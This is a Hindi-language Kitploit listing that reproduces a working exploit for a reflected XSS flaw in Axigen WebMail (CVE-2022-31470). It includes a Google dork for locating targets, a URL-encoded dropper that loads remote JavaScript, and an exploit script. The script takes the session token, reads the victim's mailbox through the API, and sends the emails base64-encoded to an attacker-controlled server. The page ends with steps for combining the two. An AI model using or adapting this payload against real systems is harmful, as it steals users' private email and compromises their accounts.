Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2023-08-21-exploit — Axigen < 10.3.3.47, 10.2.3.12 - Reflected XSS | Kitploit
उपकरण/GitHubGitHub/amirzargham/cve-2023-08-21-exploit
फ़िशिंग उपकरणभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणडेटा निष्कासनजानकारी एकत्र करना
GitHubamirzargham/cve-2023-08-21-exploit

CVE-2023-08-21-exploit

Axigen < 10.3.3.47, 10.2.3.12 - Reflected XSS

रिपॉजिटरी देखें
132 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

शोषण शीर्षक: Axigen < 10.3.3.47, 10.2.3.12 - परावर्तित XSS

Google Dork: inurl:passwordexpired=yes

दिनांक: 2023-08-21

शोषण लेखक: AmirZargham

विक्रेता होमपेज: https://www.axigen.com/

सॉफ्टवेयर लिंक: https://www.axigen.com/mail-server/download/

संस्करण: (10.5.0–4370c946) और Axigen WebMail के पुराने संस्करण

परीक्षण किया गया: firefox,chrome

CVE: CVE-2022-31470

शोषण हम इस कमजोरी का शोषण करने के लिए दूसरे परावर्तित XSS का उपयोग करते हैं, एक दुर्भावनापूर्ण लिंक बनाते हैं, और उपयोगकर्ता ईमेल चुराते हैं।

ड्रॉपर कोड यह ड्रॉपर कोड, एक दूरस्थ सर्वर से JavaScript शोषण कोड लोड और निष्पादित करता है।

root@kitploit:~
');
x = document.createElement('script');
x.src = 'https://example.com/exploit.js';
window.addEventListener('DOMContentLoaded',function y(){
  document.body.appendChild(x)
})//

एन्कोडेड रूप /index.hsp?m=%27)%3Bx%3Ddocument.createElement(%27script%27)%3Bx.src%3D%27 https://example.com/exploit.js%27%3Bwindow.addEventListener(%27DOMContentLoaded%27,function+y(){document.body.appendChild(x)})//

शोषण कोड

root@kitploit:~
xhr1 = new XMLHttpRequest(), xhr2 = new XMLHttpRequest(), xhr3 = new
XMLHttpRequest();
oob_server = 'https://example.com/';
var script_tag = document.createElement('script');

xhr1.open('GET', '/', true);
xhr1.onreadystatechange = () => {
    if (xhr1.readyState === XMLHttpRequest.DONE) {
        _h_cookie = new URL(xhr1.responseURL).search.split("=")[1];
        xhr2.open('PATCH', `/api/v1/conversations/MQ/?_h=${_h_cookie}`,
true);
        xhr2.setRequestHeader('Content-Type', 'application/json');
        xhr2.onreadystatechange = () => {
            if (xhr2.readyState === XMLHttpRequest.DONE) {
                if (xhr2.status === 401){
                    script_tag.src =
`${oob_server}?status=session_expired&domain=${document.domain}`;
                    document.body.appendChild(script_tag);
                } else {
                    resp = xhr2.responseText;
                    folderId = JSON.parse(resp)["mails"][0]["folderId"];
                    xhr3.open('GET',
`/api/v1/conversations?folderId=${folderId}&_h=${_h_cookie}`, true);
                    xhr3.onreadystatechange = () => {
                        if (xhr3.readyState === XMLHttpRequest.DONE) {
                            emails = xhr3.responseText;
                            script_tag.src =
`${oob_server}?status=ok&domain=${document.domain}&emails=${btoa(emails)}`;
                            document.body.appendChild(script_tag);
                        }
                    };
                    xhr3.send();
                }
            }
        };
        var body = JSON.stringify({isUnread: false});
        xhr2.send(body);
    }
};
xhr1.send();

ड्रॉपर और शोषण को संयोजित करना आप शोषण कोड को कहीं होस्ट कर सकते हैं और फिर ड्रॉपर कोड में उसे संबोधित कर सकते हैं।

में प्रकाशित: exploit-db.

में प्रकाशित: 0day.today.

में प्रकाशित: packet storm.

टूल डाउनलोड करें